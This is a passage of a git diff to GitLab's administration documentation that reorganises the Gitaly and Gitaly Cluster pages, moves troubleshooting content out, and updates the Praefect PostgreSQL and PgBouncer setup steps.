responds with HTTP status code 429 to POST requests at protected paths that exceed 10 requests per minute, per IP address. +- [Git and container registry failed authentication ban](../user/gitlab_com/index.md#git-and-container-registry-failed-authentication-ban): GitLab SaaS responds with HTTP status code 403 for one hour if it receives 30 failed authentication requests in three minutes from a single IP address. + +## GitLab training resources + +You can learn more about how to administer GitLab. + +- Get involved in the [GitLab Forum](https://forum.gitlab.com/) to trade tips with our talented community. +- Check out [our blog](https://about.gitlab.com/blog/) for ongoing updates on: + - Releases + - Applications + - Contributions + - News + - Events + +### Paid GitLab training + +- GitLab education services: Learn more about [GitLab and DevOps best practices](https://about.gitlab.com/services/education/) through our specialized training courses. See our full course catalog. +- GitLab technical certifications: Explore our [certification options](https://about.gitlab.com/handbook/customer-success/professional-services-engineering/gitlab-technical-certifications/) that focus on key GitLab and DevOps skills. + +### Free GitLab training + +- GitLab basics: Discover self-service guides on [Git and GitLab basics](../gitlab-basics/index.md). +- GitLab Learn: Learn new GitLab skills in a structured course at [GitLab Learn](https://about.gitlab.com/learn/). + +### Third-party training + +- Udemy: For a more affordable, guided training option, consider + [GitLab CI: Pipelines, CI/CD, and DevOps for Beginners](https://www.udemy.com/course/gitlab-ci-pipelines-ci-cd-and-devops-for-beginners/) on Udemy. +- LinkedIn Learning: Check out [Continuous Delivery with GitLab](https://www.linkedin.com/learning/continuous-delivery-with-gitlab) on LinkedIn Learning + for another low-cost, guided training option. diff --git a/doc/administration/git_protocol.md b/doc/administration/git_protocol.md index acc05a77bee..6e391cb459e 100644 --- a/doc/administration/git_protocol.md +++ b/doc/administration/git_protocol.md @@ -99,7 +99,7 @@ $ GIT_TRACE_PACKET=1 git -c protocol.version=2 ls-remote https://your-gitlab-ins Verify Git v2 is used by the client: ```shell -GIT_SSH_COMMAND="ssh -v" git -c protocol.version=2 ls-remote ssh://your-gitlab-instance.com:group/repo.git 2>&1 |grep GIT_PROTOCOL +GIT_SSH_COMMAND="ssh -v" git -c protocol.version=2 ls-remote ssh://git@your-gitlab-instance.com/group/repo.git 2>&1 |grep GIT_PROTOCOL ``` You should see that the `GIT_PROTOCOL` environment variable is sent: diff --git a/doc/administration/gitaly/faq.md b/doc/administration/gitaly/faq.md index 98a90925d32..a5964b7a2eb 100644 --- a/doc/administration/gitaly/faq.md +++ b/doc/administration/gitaly/faq.md @@ -7,7 +7,8 @@ type: reference # Frequently asked questions **(FREE SELF)** -The following are answers to frequently asked questions about Gitaly and Gitaly Cluster. +The following are answers to frequently asked questions about Gitaly and Gitaly Cluster. For +troubleshooting information, see [Troubleshooting Gitaly and Gitaly Cluster](troubleshooting.md). ## How does Gitaly Cluster compare to Geo? @@ -87,4 +88,4 @@ There are no special requirements. Gitaly Cluster requires PostgreSQL version 11 These tables are created per the [specific configuration section](praefect.md#postgresql). If you find you have an empty Praefect database table, see the -[relevant troubleshooting section](index.md#relation-does-not-exist-errors). +[relevant troubleshooting section](troubleshooting.md#relation-does-not-exist-errors). diff --git a/doc/administration/gitaly/index.md b/doc/administration/gitaly/index.md index eaf9e21780d..0af248e0573 100644 --- a/doc/administration/gitaly/index.md +++ b/doc/administration/gitaly/index.md @@ -19,6 +19,67 @@ Gitaly implements a client-server architecture: - [GitLab Shell](https://gitlab.com/gitlab-org/gitlab-shell). - [GitLab Workhorse](https://gitlab.com/gitlab-org/gitlab-workhorse). +Gitaly manages only Git repository access for GitLab. Other types of GitLab data aren't accessed +using Gitaly. + +GitLab accesses [repositories](../../user/project/repository/index.md) through the configured +[repository storages](../repository_storage_paths.md). Each new repository is stored on one of the +repository storages based on their +[configured weights](../repository_storage_paths.md#configure-where-new-repositories-are-stored). Each +repository storage is either: + +- A Gitaly storage with direct access to repositories using [storage paths](../repository_storage_paths.md), + where each repository is stored on a single Gitaly node. All requests are routed to this node. +- A virtual storage provided by [Gitaly Cluster](#gitaly-cluster), where each repository can be + stored on multiple Gitaly nodes for fault tolerance. In a Gitaly Cluster: + - Read requests are distributed between multiple Gitaly nodes, which can improve performance. + - Write requests are broadcast to repository replicas. + +WARNING: +Engineering support for NFS for Git repositories is deprecated. Read the +[deprecation notice](#nfs-deprecation-notice). + +## Virtual storage + +Virtual storage makes it viable to have a single repository storage in GitLab to simplify repository +management. + +Virtual storage with Gitaly Cluster can usually replace direct Gitaly storage configurations. +However, this is at the expense of additional storage space needed to store each repository on multiple +Gitaly nodes. The benefit of using Gitaly Cluster virtual storage over direct Gitaly storage is: + +- Improved fault tolerance, because each Gitaly node has a copy of every repository. +- Improved resource utilization, reducing the need for over-provisioning for shard-specific peak + loads, because read loads are distributed across Gitaly nodes. +- Manual rebalancing for performance is not required, because read loads are distributed across + Gitaly nodes. +- Simpler management, because all Gitaly nodes are identical. + +The number of repository replicas can be configured using a +[replication factor](praefect.md#replication-factor). + +It can +be uneconomical to have the same replication factor for all repositories. +[Variable replication factor](https://gitlab.com/groups/gitlab-org/-/epics/3372) is planned to +provide greater flexibility for extremely large GitLab instances. + +As with normal Gitaly storages, virtual storages can be sharded. + +## Gitaly + +The following shows GitLab set up to use direct access to Gitaly: + + + +In this example: + +- Each repository is stored on one of three Gitaly storages: `storage-1`, `storage-2`, or + `storage-3`. +- Each storage is serviced by a Gitaly node. +- The three Gitaly nodes store data on their file systems. + +### Gitaly architecture + The following illustrates the Gitaly client-server architecture: ```mermaid @@ -44,19 +105,7 @@ D -- gRPC --> Gitaly E --> F ``` -End users do not have direct access to Gitaly. Gitaly manages only Git repository access for GitLab. -Other types of GitLab data aren't accessed using Gitaly. - -<!-- vale gitlab.FutureTense = NO --> - -WARNING: -From GitLab 14.0, enhancements and bug fixes for NFS for Git repositories will no longer be -considered and customer technical support will be considered out of scope. -[Read more about Gitaly and NFS](#nfs-deprecation-notice). - -<!-- vale gitlab.FutureTense = YES --> - -## Configure Gitaly +### Configure Gitaly Gitaly comes pre-configured with Omnibus GitLab, which is a configuration [suitable for up to 1000 users](../reference_architectures/1k_users.md). For: @@ -72,10 +121,24 @@ default value. The default value depends on the GitLab version. ## Gitaly Cluster -Gitaly, the service that provides storage for Git repositories, can -be run in a clustered configuration to scale the Gitaly service and increase -fault tolerance. In this configuration, every Git repository is stored on every -Gitaly node in the cluster. +Git storage is provided through the Gitaly service in GitLab, and is essential to the operation of +GitLab. When the number of users, repositories, and activity grows, it is important to scale Gitaly +appropriately by: + +- Increasing the available CPU and memory resources available to Git before + resource exhaustion degrades Git, Gitaly, and GitLab application performance. +- Increasing available storage before storage limits are reached causing write + operations to fail. +- Removing single points of failure to improve fault tolerance. Git should be + considered mission critical if a service degradation would prevent you from + deploying changes to production. + +Gitaly can be run in a clustered configuration to: + +- Scale the Gitaly service. +- Increase fault tolerance. + +In this configuration, every Git repository can be stored on multiple Gitaly nodes in the cluster. Using a Gitaly Cluster increases fault tolerance by: @@ -87,6 +150,19 @@ NOTE: Technical support for Gitaly clusters is limited to GitLab Premium and Ultimate customers. +The following shows GitLab set up to access `storage-1`, a virtual storage provided by Gitaly +Cluster: + + + +In this example: + +- Repositories are stored on a virtual storage called `storage-1`. +- Three Gitaly nodes provide `storage-1` access: `gitaly-1`, `gitaly-2`, and `gitaly-3`. +- The three Gitaly nodes share data in three separate hashed storage locations. +- The [replication factor](praefect.md#replication-factor) is `3`. There are three copies maintained + of each repository. + The availability objectives for Gitaly clusters are: - **Recovery Point Objective (RPO):** Less than 1 minute. @@ -110,33 +186,18 @@ Gitaly Cluster supports: - [Strong consistency](praefect.md#strong-consistency) of the secondary replicas. - [Automatic failover](praefect.md#automatic-failover-and-primary-election-strategies) from the primary to the secondary. - Reporting of possible data loss if replication queue is non-empty. -- Marking repositories as [read-only](praefect.md#read-only-mode) if data loss is detected to prevent data inconsistencies. +- From GitLab 13.0 to GitLab 14.0, marking repositories as [read-only](praefect.md#read-only-mode) + if data loss is detected to prevent data inconsistencies. Follow the [Gitaly Cluster epic](https://gitlab.com/groups/gitlab-org/-/epics/1489) for improvements including [horizontally distributing reads](https://gitlab.com/groups/gitlab-org/-/epics/2013). -### Overview - -Git storage is provided through the Gitaly service in GitLab, and is essential -to the operation of the GitLab application. When the number of -users, repositories, and activity grows, it is important to scale Gitaly -appropriately by: - -- Increasing the available CPU and memory resources available to Git before - resource exhaustion degrades Git, Gitaly, and GitLab application performance. -- Increase available storage before storage limits are reached causing write - operations to fail. -- Improve fault tolerance by removing single points of failure. Git should be - considered mission critical if a service degradation would prevent you from - deploying changes to production. - ### Moving beyond NFS WARNING: -From GitLab 13.0, using NFS for Git repositories is deprecated. In GitLab 14.0, -support for NFS for Git repositories is scheduled to be removed. Upgrade to -Gitaly Cluster as soon as possible. +Engineering support for NFS for Git repositories is deprecated. Technical support is planned to be +unavailable from GitLab 15.0. No further enhancements are planned for this feature. [Network File System (NFS)](https://en.wikipedia.org/wiki/Network_File_System) is not well suited to Git workloads which are CPU and IOPS sensitive. @@ -159,22 +220,6 @@ Further reading: - Blog post: [The road to Gitaly v1.0 (aka, why GitLab doesn't require NFS for storing Git data anymore)](https://about.gitlab.com/blog/2018/09/12/the-road-to-gitaly-1-0/) - Blog post: [How we spent two weeks hunting an NFS bug in the Linux kernel](https://about.gitlab.com/blog/2018/11/14/how-we-spent-two-weeks-hunting-an-nfs-bug/) -### Where Gitaly Cluster fits - -GitLab accesses [repositories](../../user/project/repository/index.md) through the configured -[repository storages](../repository_storage_paths.md). Each new repository is stored on one of the -repository storages based on their configured weights. Each repository storage is either: - -- A Gitaly storage served directly by Gitaly. These map to a directory on the file system of a - Gitaly node. -- A [virtual storage](#virtual-storage-or-direct-gitaly-storage) served by Praefect. A virtual - storage is a cluster of Gitaly storages that appear as a single repository storage. - -Virtual storages are a feature of Gitaly Cluster. They support replicating the repositories to -multiple storages for fault tolerance. Virtual storages can improve performance by distributing -requests across Gitaly nodes. Their distributed nature makes it viable to have a single repository -storage in GitLab to simplify repository management. - ### Components of Gitaly Cluster Gitaly Cluster consists of multiple components: @@ -182,59 +227,10 @@ Gitaly Cluster consists of multiple components: - [Load balancer](praefect.md#load-balancer) for distributing requests and providing fault-tolerant access to Praefect nodes. - [Praefect](praefect.md#praefect) nodes for managing the cluster and routing requests to Gitaly nodes. -- [PostgreSQL database](praefect.md#postgresql) for persisting cluster metadata and [PgBouncer](praefect.md#pgbouncer), +- [PostgreSQL database](praefect.md#postgresql) for persisting cluster metadata and [PgBouncer](praefect.md#use-pgbouncer), recommended for pooling Praefect's database connections. - Gitaly nodes to provide repository storage and Git access. - - -In this example: - -- Repositories are stored on a virtual storage called `storage-1`. -- Three Gitaly nodes provide `storage-1` access: `gitaly-1`, `gitaly-2`, and `gitaly-3`. -- The three Gitaly nodes store data on their file systems. - -### Virtual storage or direct Gitaly storage - -Gitaly supports multiple models of scaling: - -- Clustering using Gitaly Cluster, where each repository is stored on multiple Gitaly nodes in the - cluster. Read requests are distributed between repository replicas and write requests are - broadcast to repository replicas. GitLab accesses virtual storage. -- Direct access to Gitaly storage using [repository storage paths](../repository_storage_paths.md), - where each repository is stored on the assigned Gitaly node. All requests are routed to this node. - -The following is Gitaly set up to use direct access to Gitaly instead of Gitaly Cluster: - - - -In this example: - -- Each repository is stored on one of three Gitaly storages: `storage-1`, `storage-2`, - or `storage-3`. -- Each storage is serviced by a Gitaly node. -- The three Gitaly nodes share data in three separate hashed storage locations. -- The [replication factor](praefect.md#replication-factor) is `3`. There are three copies maintained - of each repository. - -Generally, virtual storage with Gitaly Cluster can replace direct Gitaly storage configurations, at -the expense of additional storage needed to store each repository on multiple Gitaly nodes. The -benefit of using Gitaly Cluster over direct Gitaly storage is: - -- Improved fault tolerance, because each Gitaly node has a copy of every repository. -- Improved resource utilization, reducing the need for over-provisioning for shard-specific peak - loads, because read loads are distributed across replicas. -- Manual rebalancing for performance is not required, because read loads are distributed across - replicas. -- Simpler management, because all Gitaly nodes are identical. - -Under some workloads, CPU and memory requirements may require a large fleet of Gitaly nodes. It -can be uneconomical to have one to one replication factor. - -A hybrid approach can be used in these instances, where each shard is configured as a smaller -cluster. [Variable replication factor](https://gitlab.com/groups/gitlab-org/-/epics/3372) is planned -to provide greater flexibility for extremely large GitLab instances. - ### Architecture Praefect is a router and transaction manager for Gitaly, and a required @@ -360,385 +356,21 @@ The second facet presents the only real solution. For this, we developed ## NFS deprecation notice -<!-- vale gitlab.FutureTense = NO --> - -From GitLab 14.0, enhancements and bug fixes for NFS for Git repositories will no longer be -considered and customer technical support will be considered out of scope. +Engineering support for NFS for Git repositories is deprecated. Technical support is planned to be +unavailable from GitLab 15.0. No further enhancements are planned for this feature. Additional information: - [Recommended NFS mount options and known issues with Gitaly and NFS](../nfs.md#upgrade-to-gitaly-cluster-or-disable-caching-if-experiencing-data-loss). - [GitLab statement of support](https://about.gitlab.com/support/statement-of-support.html#gitaly-and-nfs). -<!-- vale gitlab.FutureTense = YES --> - GitLab recommends: - Creating a [Gitaly Cluster](#gitaly-cluster) as soon as possible. - [Moving your repositories](praefect.md#migrate-to-gitaly-cluster) from NFS-based storage to Gitaly Cluster. -We welcome your feedback on this process: raise a support ticket, or [comment on the epic](https://gitlab.com/groups/gitlab-org/-/epics/4916). - -## Troubleshooting - -Refer to the information below when troubleshooting Gitaly and Gitaly Cluster. - -Before troubleshooting, see the Gitaly and Gitaly Cluster -[frequently asked questions](faq.md). - -### Troubleshoot Gitaly - -The following sections provide possible solutions to Gitaly errors. - -See also [Gitaly timeout](../../user/admin_area/settings/gitaly_timeouts.md) settings. - -#### Check versions when using standalone Gitaly servers - -When using standalone Gitaly servers, you must make sure they are the same version -as GitLab to ensure full compatibility: - -1. On the top bar, select **Menu >** **{admin}** **Admin** on your GitLab instance. -1. On the left sidebar, select **Overview > Gitaly Servers**. -1. Confirm all Gitaly servers indicate that they are up to date. - -#### Use `gitaly-debug` - -The `gitaly-debug` command provides "production debugging" tools for Gitaly and Git -performance. It is intended to help production engineers and support -engineers investigate Gitaly performance problems. - -If you're using GitLab 11.6 or newer, this tool should be installed on -your GitLab or Gitaly server already at `/opt/gitlab/embedded/bin/gitaly-debug`. -If you're investigating an older GitLab version you can compile this -tool offline and copy the executable to your server: - -```shell -git clone https://gitlab.com/gitlab-org/gitaly.git -cd cmd/gitaly-debug -GOOS=linux GOARCH=amd64 go build -o gitaly-debug -``` - -To see the help page of `gitaly-debug` for a list of supported sub-commands, run: - -```shell -gitaly-debug -h -``` - -#### Commits, pushes, and clones return a 401 - -```plaintext -remote: GitLab: 401 Unauthorized -``` - -You need to sync your `gitlab-secrets.json` file with your GitLab -application nodes. - -#### Client side gRPC logs - -Gitaly uses the [gRPC](https://grpc.io/) RPC framework. The Ruby gRPC -client has its own log file which may contain useful information when -you are seeing Gitaly errors. You can control the log level of the -gRPC client with the `GRPC_LOG_LEVEL` environment variable. The -default level is `WARN`. - -You can run a gRPC trace with: - -```shell -sudo GRPC_TRACE=all GRPC_VERBOSITY=DEBUG gitlab-rake gitlab:gitaly:check -``` - -#### Server side gRPC logs - -gRPC tracing can also be enabled in Gitaly itself with the `GODEBUG=http2debug` -environment variable. To set this in an Omnibus GitLab install: - -1. Add the following to your `gitlab.rb` file: - - ```ruby - gitaly['env'] = { - "GODEBUG=http2debug" => "2" - } - ``` - -1. [Reconfigure](../restart_gitlab.md#omnibus-gitlab-reconfigure) GitLab. - -#### Correlating Git processes with RPCs - -Sometimes you need to find out which Gitaly RPC created a particular Git process. - -One method for doing this is by using `DEBUG` logging. However, this needs to be enabled -ahead of time and the logs produced are quite verbose. - -A lightweight method for doing this correlation is by inspecting the environment -of the Git process (using its `PID`) and looking at the `CORRELATION_ID` variable: - -```shell -PID=<Git process ID> -sudo cat /proc/$PID/environ | tr '\0' '\n' | grep ^CORRELATION_ID= -``` - -This method isn't reliable for `git cat-file` processes, because Gitaly -internally pools and re-uses those across RPCs. - -#### Observing `gitaly-ruby` traffic +We welcome your feedback on this process. You can: -[`gitaly-ruby`](configure_gitaly.md#gitaly-ruby) is an internal implementation detail of Gitaly, -so, there's not that much visibility into what goes on inside -`gitaly-ruby` processes. - -If you have Prometheus set up to scrape your Gitaly process, you can see -request rates and error codes for individual RPCs in `gitaly-ruby` by -querying `grpc_client_handled_total`. - -- In theory, this metric does not differentiate between `gitaly-ruby` and other RPCs. -- In practice from GitLab 11.9, all gRPC calls made by Gitaly itself are internal calls from the - main Gitaly process to one of its `gitaly-ruby` sidecars. - -Assuming your `grpc_client_handled_total` counter only observes Gitaly, -the following query shows you RPCs are (most likely) internally -implemented as calls to `gitaly-ruby`: - -```prometheus -sum(rate(grpc_client_handled_total[5m])) by (grpc_method) > 0 -``` - -#### Repository changes fail with a `401 Unauthorized` error - -If you run Gitaly on its own server and notice these conditions: - -- Users can successfully clone and fetch repositories by using both SSH and HTTPS. -- Users can't push to repositories, or receive a `401 Unauthorized` message when attempting to - make changes to them in the web UI. - -Gitaly may be failing to authenticate with the Gitaly client because it has the -[wrong secrets file](configure_gitaly.md#configure-gitaly-servers). - -Confirm the following are all true: - -- When any user performs a `git push` to any repository on this Gitaly server, it - fails with a `401 Unauthorized` error: - - ```shell - remote: GitLab: 401 Unauthorized - To <REMOTE_URL> - ! [remote rejected] branch-name -> branch-name (pre-receive hook declined) - error: failed to push some refs to '<REMOTE_URL>' - ``` - -- When any user adds or modifies a file from the repository using the GitLab - UI, it immediately fails with a red `401 Unauthorized` banner. -- Creating a new project and [initializing it with a README](../../user/project/working_with_projects.md#blank-projects) - successfully creates the project but doesn't create the README. -- When [tailing the logs](https://docs.gitlab.com/omnibus/settings/logs.html#tail-logs-in-a-console-on-the-server) - on a Gitaly client and reproducing the error, you get `401` errors - when reaching the [`/api/v4/internal/allowed`](../../development/internal_api.md) endpoint: - - ```shell - # api_json.log - { - "time": "2019-07-18T00:30:14.967Z", - "severity": "INFO", - "duration": 0.57, - "db": 0, - "view": 0.57, - "status": 401, - "method": "POST", - "path": "\/api\/v4\/internal\/allowed", - "params": [ - { - "key": "action", - "value": "git-receive-pack" - }, - { - "key": "changes", - "value": "REDACTED" - }, - { - "key": "gl_repository", - "value": "REDACTED" - }, - { - "key": "project", - "value": "\/path\/to\/project.git" - }, - { - "key": "protocol", - "value": "web" - }, - { - "key": "env", - "value": "{\"GIT_ALTERNATE_OBJECT_DIRECTORIES\":[],\"GIT_ALTERNATE_OBJECT_DIRECTORIES_RELATIVE\":[],\"GIT_OBJECT_DIRECTORY\":null,\"GIT_OBJECT_DIRECTORY_RELATIVE\":null}" - }, - { - "key": "user_id", - "value": "2" - }, - { - "key": "secret_token", - "value": "[FILTERED]" - } - ], - "host": "gitlab.example.com", - "ip": "REDACTED", - "ua": "Ruby", - "route": "\/api\/:version\/internal\/allowed", - "queue_duration": 4.24, - "gitaly_calls": 0, - "gitaly_duration": 0, - "correlation_id": "XPUZqTukaP3" - } - - # nginx_access.log - [IP] - - [18/Jul/2019:00:30:14 +0000] "POST /api/v4/internal/allowed HTTP/1.1" 401 30 "" "Ruby" - ``` - -To fix this problem, confirm that your [`gitlab-secrets.json` file](configure_gitaly.md#configure-gitaly-servers) -on the Gitaly server matches the one on Gitaly client. If it doesn't match, -update the secrets file on the Gitaly server to match the Gitaly client, then -[reconfigure](../restart_gitlab.md#omnibus-gitlab-reconfigure). - -#### Command line tools cannot connect to Gitaly - -gRPC cannot reach your Gitaly server if: - -- You can't connect to a Gitaly server with command-line tools. -- Certain actions result in a `14: Connect Failed` error message. - -Verify you can reach Gitaly by using TCP: - -```shell -sudo gitlab-rake gitlab:tcp_check[GITALY_SERVER_IP,GITALY_LISTEN_PORT] -``` - -If the TCP connection: - -- Fails, check your network settings and your firewall rules. -- Succeeds, your networking and firewall rules are correct. - -If you use proxy servers in your command line environment such as Bash, these can interfere with -your gRPC traffic. - -If you use Bash or a compatible command line environment, run the following commands to determine -whether you have proxy servers configured: - -```shell -echo $http_proxy -echo $https_proxy -``` - -If either of these variables have a value, your Gitaly CLI connections may be getting routed through -a proxy which cannot connect to Gitaly. - -To remove the proxy setting, run the following commands (depending on which variables had values): - -```shell -unset http_proxy -unset https_proxy -``` - -#### Permission denied errors appearing in Gitaly or Praefect logs when accessing repositories - -You might see the following in Gitaly and Praefect logs: - -```shell -{ - ... - "error":"rpc error: code = PermissionDenied desc = permission denied", - "grpc.code":"PermissionDenied", - "grpc.meta.client_name":"gitlab-web", - "grpc.request.fullMethod":"/gitaly.ServerService/ServerInfo", - "level":"warning", - "msg":"finished unary call with code PermissionDenied", - ... -} -``` - -This is a GRPC call -[error response code](https://grpc.github.io/grpc/core/md_doc_statuscodes.html). - -If this error occurs, even though -[the Gitaly auth tokens are set up correctly](#praefect-errors-in-logs), -it's likely that the Gitaly servers are experiencing -[clock drift](https://en.wikipedia.org/wiki/Clock_drift). - -Ensure the Gitaly clients and servers are synchronized, and use an NTP time -server to keep them synchronized. - -#### Gitaly not listening on new address after reconfiguring - -When updating the `gitaly['listen_addr']` or `gitaly['prometheus_listen_addr']` values, Gitaly may -continue to listen on the old address after a `sudo gitlab-ctl reconfigure`. - -When this occurs, run `sudo gitlab-ctl restart` to resolve the issue. This should no longer be -necessary because [this issue](https://gitlab.com/gitlab-org/gitaly/-/issues/2521) is resolved. - -#### Permission denied errors appearing in Gitaly logs when accessing repositories from a standalone Gitaly node - -If this error occurs even though file permissions are correct, it's likely that the Gitaly node is -experiencing [clock drift](https://en.wikipedia.org/wiki/Clock_drift). - -Please ensure that the GitLab and Gitaly nodes are synchronized and use an NTP time -server to keep them synchronized if possible. - -### Troubleshoot Praefect (Gitaly Cluster) - -The following sections provide possible solutions to Gitaly Cluster errors. - -#### Praefect errors in logs - -If you receive an error, check `/var/log/gitlab/gitlab-rails/production.log`. - -Here are common errors and potential causes: - -- 500 response code - - **ActionView::Template::Error (7:permission denied)** - - `praefect['auth_token']` and `gitlab_rails['gitaly_token']` do not match on the GitLab server. - - **Unable to save project. Error: 7:permission denied** - - Secret token in `praefect['storage_nodes']` on GitLab server does not match the - value in `gitaly['auth_token']` on one or more Gitaly servers. -- 503 response code - - **GRPC::Unavailable (14:failed to connect to all addresses)** - - GitLab was unable to reach Praefect. - - **GRPC::Unavailable (14:all SubCons are in TransientFailure...)** - - Praefect cannot reach one or more of its child Gitaly nodes. Try running - the Praefect connection checker to diagnose. - -#### Determine primary Gitaly node - -To determine the current primary Gitaly node for a specific Praefect node: - -- Use the `Shard Primary Election` [Grafana chart](praefect.md#grafana) on the - [`Gitlab Omnibus - Praefect` dashboard](https://gitlab.com/gitlab-org/grafana-dashboards/-/blob/master/omnibus/praefect.json). - This is recommended. -- If you do not have Grafana set up, use the following command on each host of each - Praefect node: - - ```shell - curl localhost:9652/metrics | grep gitaly_praefect_primaries` - ``` - -#### Relation does not exist errors - -By default Praefect database tables are created automatically by `gitlab-ctl reconfigure` task. -However, if the `gitlab-ctl reconfigure` command isn't executed or there are errors during the -execution, the Praefect database tables are not created on initial reconfigure and can throw -errors that relations do not exist. - -For example: - -- `ERROR: relation "node_status" does not exist at character 13` -- `ERROR: relation "replication_queue_lock" does not exist at character 40` -- This error: - - ```json - {"level":"error","msg":"Error updating node: pq: relation \"node_status\" does not exist","pid":210882,"praefectName":"gitlab1x4m:0.0.0.0:2305","time":"2021-04-01T19:26:19.473Z","virtual_storage":"praefect-cluster-1"} - ``` - -To solve this, the database schema migration can be done using `sql-migrate` sub-command of -the `praefect` command: - -```shell -$ sudo /opt/gitlab/embedded/bin/praefect -config /var/opt/gitlab/praefect/config.toml sql-migrate -praefect sql-migrate: OK (applied 21 migrations) -``` +- Raise a support ticket. +- [Comment on the epic](https://gitlab.com/groups/gitlab-org/-/epics/4916). diff --git a/doc/administration/gitaly/praefect.md b/doc/administration/gitaly/praefect.md index 21e5360e27b..e483bcc944a 100644 --- a/doc/administration/gitaly/praefect.md +++ b/doc/administration/gitaly/praefect.md @@ -43,8 +43,8 @@ default value. The default value depends on the GitLab version. ## Setup Instructions -If you [installed](https://about.gitlab.com/install/) GitLab using the Omnibus -package (highly recommended), follow the steps below: +If you [installed](https://about.gitlab.com/install/) GitLab using the Omnibus GitLab package +(highly recommended), follow the steps below: 1. [Preparation](#preparation) 1. [Configuring the Praefect database](#postgresql) @@ -59,25 +59,27 @@ package (highly recommended), follow the steps below: Before beginning, you should already have a working GitLab instance. [Learn how to install GitLab](https://about.gitlab.com/install/). -Provision a PostgreSQL server (PostgreSQL 11 or newer). +Provision a PostgreSQL server. We recommend using the PostgreSQL that is shipped +with Omnibus GitLab and use it to configure the PostgreSQL database. You can use an +external PostgreSQL server (version 11 or newer) but you must set it up [manually](#manual-database-setup). -Prepare all your new nodes by [installing -GitLab](https://about.gitlab.com/install/). +Prepare all your new nodes by [installing GitLab](https://about.gitlab.com/install/). You need: +- 1 PostgreSQL node +- 1 PgBouncer node (optional) - At least 1 Praefect node (minimal storage required) - 3 Gitaly nodes (high CPU, high memory, fast storage) - 1 GitLab server -You need the IP/host address for each node. +You also need the IP/host address for each node: -1. `LOAD_BALANCER_SERVER_ADDRESS`: the IP/host address of the load balancer -1. `POSTGRESQL_SERVER_ADDRESS`: the IP/host address of the PostgreSQL server +1. `PRAEFECT_LOADBALANCER_HOST`: the IP/host address of Praefect load balancer +1. `POSTGRESQL_HOST`: the IP/host address of the PostgreSQL server +1. `PGBOUNCER_HOST`: the IP/host address of the PostgreSQL server 1. `PRAEFECT_HOST`: the IP/host address of the Praefect server 1. `GITALY_HOST_*`: the IP or host address of each Gitaly server 1. `GITLAB_HOST`: the IP/host address of the GitLab server -If you are using a cloud provider, you can look up the addresses for each server through your cloud provider's management console. - If you are using Google Cloud Platform, SoftLayer, or any other vendor that provides a virtual private cloud (VPC) you can use the private addresses for each cloud instance (corresponds to "internal address" for Google Cloud Platform) for `PRAEFECT_HOST`, `GITALY_HOST_*`, and `GITLAB_HOST`. #### Secrets @@ -98,6 +100,14 @@ with secure tokens as you complete the setup process. Praefect cluster directly; that could lead to data loss. 1. `PRAEFECT_SQL_PASSWORD`: this password is used by Praefect to connect to PostgreSQL. +1. `PRAEFECT_SQL_PASSWORD_HASH`: the hash of password of the Praefect user. + Use `gitlab-ctl pg-password-md5 praefect` to generate the hash. The command + asks for the password for `praefect` user. Enter `PRAEFECT_SQL_PASSWORD` + plaintext password. By default, Praefect uses `praefect` user, but you can + change it. +1. `PGBOUNCER_SQL_PASSWORD_HASH`: the hash of password of the PgBouncer user. + PgBouncer uses this password to connect to PostgreSQL. For more details + see [bundled PgBouncer](../postgresql/pgbouncer.md) documentation. We note in the instructions below where these secrets are required. @@ -108,127 +118,210 @@ Omnibus GitLab installations can use `gitlab-secrets.json` for `GITLAB_SHELL_SEC NOTE: Do not store the GitLab application database and the Praefect -database on the same PostgreSQL server if using -[Geo](../geo/index.md). The replication state is internal to each instance -of GitLab and should not be replicated. +database on the same PostgreSQL server if using [Geo](../geo/index.md). +The replication state is internal to each instance of GitLab and should +not be replicated. These instructions help set up a single PostgreSQL database, which creates a single point of -failure. The following options are available: +failure. Alternatively, [you can use PostgreSQL replication and failover](../postgresql/replication_and_failover.md). + +The following options are available: - For non-Geo installations, either: - Use one of the documented [PostgreSQL setups](../postgresql/index.md). - - Use your own third-party database setup, if fault tolerance is required. + - Use your own third-party database setup. This will require [manual setup](#manual-database-setup). - For Geo instances, either: - Set up a separate [PostgreSQL instance](https://www.postgresql.org/docs/11/high-availability.html). - Use a cloud-managed PostgreSQL service. AWS [Relational Database Service](https://aws.amazon.com/rds/) is recommended. -To complete this section you need: +#### Manual database setup -- 1 Praefect node -- 1 PostgreSQL server (PostgreSQL 11 or newer) - - An SQL user with permissions to create databases +To complete this section you need: -During this section, we configure the PostgreSQL server, from the Praefect -node, using `psql` which is installed by Omnibus GitLab. +- One Praefect node +- One PostgreSQL node (version 11 or newer) + - A PostgreSQL user with permissions to manage the database server -1. SSH into the **Praefect** node and login as root: +In this section, we configure the PostgreSQL database. This can be used for both external +and Omnibus-provided PostgreSQL server. - ```shell - sudo -i - ``` +To run the following instructions, you can use the Praefect node, where `psql` is installed +by Omnibus GitLab (`/opt/gitlab/embedded/bin/psql`). If you are using the Omnibus-provided +PostgreSQL you can use `gitlab-psql` on the PostgreSQL node instead: -1. Connect to the PostgreSQL server with administrative access. This is likely - the `postgres` user. The database `template1` is used because it is created - by default on all PostgreSQL servers. +1. Create a new user `praefect` to be used by Praefect: - ```shell - /opt/gitlab/embedded/bin/psql -U postgres -d template1 -h POSTGRESQL_SERVER_ADDRESS + ```sql + CREATE ROLE praefect WITH LOGIN PASSWORD 'PRAEFECT_SQL_PASSWORD'; ``` - Create a new user `praefect` to be used by Praefect. Replace - `PRAEFECT_SQL_PASSWORD` with the strong password you generated in the - preparation step. + Replace `PRAEFECT_SQL_PASSWORD` with the strong password you generated in the preparation step. + +1. Create a new database `praefect_production` that is owned by `praefect` user. ```sql - CREATE ROLE praefect WITH LOGIN CREATEDB PASSWORD 'PRAEFECT_SQL_PASSWORD'; + CREATE DATABASE praefect_production WITH OWNER praefect ENCODING UTF8; ``` -1. Reconnect to the PostgreSQL server, this time as the `praefect` user: +For using Omnibus-provided PgBouncer you need to take the following additional steps. We strongly +recommend using the PostgreSQL that is shipped with Omnibus as the backend. The following +instructions only work on Omnibus-provided PostgreSQL: - ```shell - /opt/gitlab/embedded/bin/psql -U praefect -d template1 -h POSTGRESQL_SERVER_ADDRESS +1. For Omnibus-provided PgBouncer, you need to use the hash of `praefect` user instead the of the + actual password: + + ```sql + ALTER ROLE praefect WITH PASSWORD 'md5<PRAEFECT_SQL_PASSWORD_HASH>'; ``` - Create a new database `praefect_production`. By creating the database while - connected as the `praefect` user, we are confident they have access. + Replace `<PRAEFECT_SQL_PASSWORD_HASH>` with the hash of the password you generated in the + preparation step. Note that it is prefixed with `md5` literal. + +1. The PgBouncer that is shipped with 